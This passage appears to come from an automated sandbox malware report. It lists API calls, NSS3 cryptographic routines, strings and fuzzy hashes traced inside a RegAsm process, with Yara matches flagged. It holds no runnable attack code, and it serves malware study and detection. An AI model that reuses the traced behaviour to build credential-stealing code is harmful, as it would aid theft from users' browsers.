                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                                                                                                                                  • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C95AB3E,?,?), ref: 6C95AC70
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: TlsGetValue.KERNEL32 ref: 6C93E33C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: EnterCriticalSection.KERNEL32(?), ref: 6C93E350
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: PR_Unlock.NSS3(?), ref: 6C93E5BC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C93E5CA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: TlsGetValue.KERNEL32 ref: 6C93E5F2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: EnterCriticalSection.KERNEL32(?), ref: 6C93E606
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93E300: PORT_Alloc_Util.NSS3(?), ref: 6C93E613
                                                                                                                                                                                                                                                                  • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C95AC92
                                                                                                                                                                                                                                                                  • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C95AB3E), ref: 6C95ACD7
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(?), ref: 6C95AD10
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C95AD2B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F360: TlsGetValue.KERNEL32(00000000,?,6C95A904,?), ref: 6C93F38B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F360: EnterCriticalSection.KERNEL32(?,?,?,6C95A904,?), ref: 6C93F3A0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F360: PR_Unlock.NSS3(?,?,?,?,6C95A904,?), ref: 6C93F3D3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2926855110-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004114D9
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411504
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0042654C,00000001,?,?,?,00000000), ref: 00411547
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00426548,00000001,?,?,?,00000000), ref: 00411575
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00426544,00000001,?,?,?,00000000), ref: 0041159A
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,00426540,00000001,?,?,?,00000000), ref: 004115CB
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411601
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strtok_s$H_prolog
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1158113254-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_Now.NSS3 ref: 6C938C7C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C938CB0
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C938CD1
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C938CE5
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C938D2E
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C938D62
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C938D93
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3131193014-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C96D9E4,00000000), ref: 6C96DC30
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C96D9E4,00000000), ref: 6C96DC4E
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C96D9E4,00000000), ref: 6C96DC5A
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C96DC7E
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C96DCAD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2632744278-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C928C1B
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C928C34
                                                                                                                                                                                                                                                                  • PL_ArenaAllocate.NSS3 ref: 6C928C65
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C928C9C
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C928CB6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                                  • String ID: KRAM
                                                                                                                                                                                                                                                                  • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6CA22CA0
                                                                                                                                                                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6CA22CBE
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,00000014), ref: 6CA22CD1
                                                                                                                                                                                                                                                                  • strdup.MOZGLUE(?), ref: 6CA22CE1
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CA22D27
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Loaded library %s (static lib), xrefs: 6CA22D22
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                                                  • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                                                  • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C9A1C74
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 6C9A1C92
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C9A1C99
                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 6C9A1CCB
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C9A1CD2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3805613680-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6C903D77,?,?,6C904E1D), ref: 6CA01C8A
                                                                                                                                                                                                                                                                  • sqlite3_free.NSS3(00000000), ref: 6CA01CB6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                                                                  • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                                                                                                                                                                                                                  • API String ID: 1840970956-3705377941
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C97DAE2,?), ref: 6C97C6C2
                                                                                                                                                                                                                                                                  • PR_Now.NSS3 ref: 6C97CD35
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                                                                                                                                    • Part of subcall function 6C966C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C3F
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C97CD54
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BF0: TlsGetValue.KERNEL32(?,?,?,6CA20A75), ref: 6C9D9C07
                                                                                                                                                                                                                                                                    • Part of subcall function 6C967260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C911CCC,00000000,00000000,?,?), ref: 6C96729F
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C97CD9B
                                                                                                                                                                                                                                                                  • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C97CE0B
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C97CE2C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                                                                                                                                  • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C97CE40
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: TlsGetValue.KERNEL32 ref: 6C9714E0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: EnterCriticalSection.KERNEL32 ref: 6C9714F5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: PR_Unlock.NSS3 ref: 6C97150D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: PORT_ArenaMark_Util.NSS3(?,6C97CD93,?), ref: 6C97CEEE
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C97CD93,?), ref: 6C97CEFC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C97CD93,?), ref: 6C97CF0B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C97CD93,?), ref: 6C97CF1D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF47
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF67
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C97CD93,?,?,?,?,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF78
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3748922049-0
                                                                                                                                                                                                                                                                  • Opcode ID: 36de9fd9717234d52a7e37d845652f3034869c33d9cb22aad22095469079baf9
                                                                                                                                                                                                                                                                  • Instruction ID: f53f41f9225cce7b7d1cb5ba0927d319323d429ed250efca895667d2f494b280
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36de9fd9717234d52a7e37d845652f3034869c33d9cb22aad22095469079baf9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D51B576A025019BE730EF69DC40BAA73F8AF68348F250524D959A7B40EB31ED05CBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041AD65
                                                                                                                                                                                                                                                                    • Part of subcall function 00419743: __mtinitlocknum.LIBCMT ref: 00419759
                                                                                                                                                                                                                                                                    • Part of subcall function 00419743: __amsg_exit.LIBCMT ref: 00419765
                                                                                                                                                                                                                                                                    • Part of subcall function 00419743: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041A3B1,0000000D,?,?,0041A805,004192A2,?,?,004183AB,00000000,0042DCE8,004183F2,?), ref: 0041976D
                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(0042DC70,00000020,0041AEA8,00000000,00000001,00000000,?,0041AECA,000000FF,?,0041976A,00000011,00000000,?,0041A3B1,0000000D), ref: 0041ADA1
                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041AECA,000000FF,?,0041976A,00000011,00000000,?,0041A3B1,0000000D,?,?,0041A805,004192A2), ref: 0041ADB2
                                                                                                                                                                                                                                                                    • Part of subcall function 0041A32A: EncodePointer.KERNEL32(00000000,0041DEFF,00641400,00000314,00000000,?,?,?,?,?,0041B0BF,00641400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041A32C
                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(-00000004,?,0041AECA,000000FF,?,0041976A,00000011,00000000,?,0041A3B1,0000000D,?,?,0041A805,004192A2), ref: 0041ADD8
                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041AECA,000000FF,?,0041976A,00000011,00000000,?,0041A3B1,0000000D,?,?,0041A805,004192A2), ref: 0041ADEB
                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041AECA,000000FF,?,0041976A,00000011,00000000,?,0041A3B1,0000000D,?,?,0041A805,004192A2), ref: 0041ADF5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2005412495-0
                                                                                                                                                                                                                                                                  • Opcode ID: fbaf8bc8fdaad2772f2fa9617a7dfcaf8ae3667767d5aa70daa19de8cdebad97
                                                                                                                                                                                                                                                                  • Instruction ID: 164a7a9cf12da0d0c7ce67e8a7a5d1831e5fbf5bcdf129820e4951e280cbab1a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbaf8bc8fdaad2772f2fa9617a7dfcaf8ae3667767d5aa70daa19de8cdebad97
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29312774D4231ADFDF109FA5D9446DDBBB2BF09314F10402BE524AA251DBB849E1CF2A
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C9A5B56
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9A3D3F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C91BA90: PORT_NewArena_Util.NSS3(00000800,6C9A3CAF,?), ref: 6C91BABF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C91BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C9A3CAF,?), ref: 6C91BAD5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C91BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C9A3CAF,?), ref: 6C91BB08
                                                                                                                                                                                                                                                                    • Part of subcall function 6C91BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C9A3CAF,?), ref: 6C91BB1A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C91BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C9A3CAF,?), ref: 6C91BB3B
                                                                                                                                                                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C9A3CCB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9090: TlsGetValue.KERNEL32 ref: 6C9D90AB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9090: TlsGetValue.KERNEL32 ref: 6C9D90C9
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9090: EnterCriticalSection.KERNEL32 ref: 6C9D90E5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9090: TlsGetValue.KERNEL32 ref: 6C9D9116
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9090: LeaveCriticalSection.KERNEL32 ref: 6C9D913F
                                                                                                                                                                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C9A3CE2
                                                                                                                                                                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C9A3CF8
                                                                                                                                                                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C9A3D15
                                                                                                                                                                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C9A3D2E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4030862364-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00419B3C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041A494: __getptd_noexit.LIBCMT ref: 0041A497
                                                                                                                                                                                                                                                                    • Part of subcall function 0041A494: __amsg_exit.LIBCMT ref: 0041A4A4
                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00419B5C
                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00419B6C
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00419B89
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00419B9C
                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(0042F1C0), ref: 00419BB4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3470314060-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00411A4A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EAB
                                                                                                                                                                                                                                                                  • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,00000104,?,00411A4A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EC4
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000104,?,00411A4A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410ED6
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410EE8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                                  • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                                                                                                                                                                                  • API String ID: 1206339513-4107738187
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C95FC55
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C95FCB2
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C95FDB7
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C95FDDE
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968800: TlsGetValue.KERNEL32(?,6C97085A,00000000,?,6C918369,?), ref: 6C968821
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968800: TlsGetValue.KERNEL32(?,?,6C97085A,00000000,?,6C918369,?), ref: 6C96883D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968800: EnterCriticalSection.KERNEL32(?,?,?,6C97085A,00000000,?,6C918369,?), ref: 6C968856
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C968887
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968800: PR_Unlock.NSS3(?,?,?,?,6C97085A,00000000,?,6C918369,?), ref: 6C968899
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                                                                  • String ID: pkcs11:
                                                                                                                                                                                                                                                                  • API String ID: 362709927-2446828420
                                                                                                                                                                                                                                                                  • Opcode ID: 6ad3ddc7725c72f5135cb39e3edb47ee695e4ff3c2bee41f36f1ace19e85390e
                                                                                                                                                                                                                                                                  • Instruction ID: 21b47b1b2faf1053b1b2b6be166ba8f263d59d2e575bd41ce2ca00f59f88a4df
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ad3ddc7725c72f5135cb39e3edb47ee695e4ff3c2bee41f36f1ace19e85390e
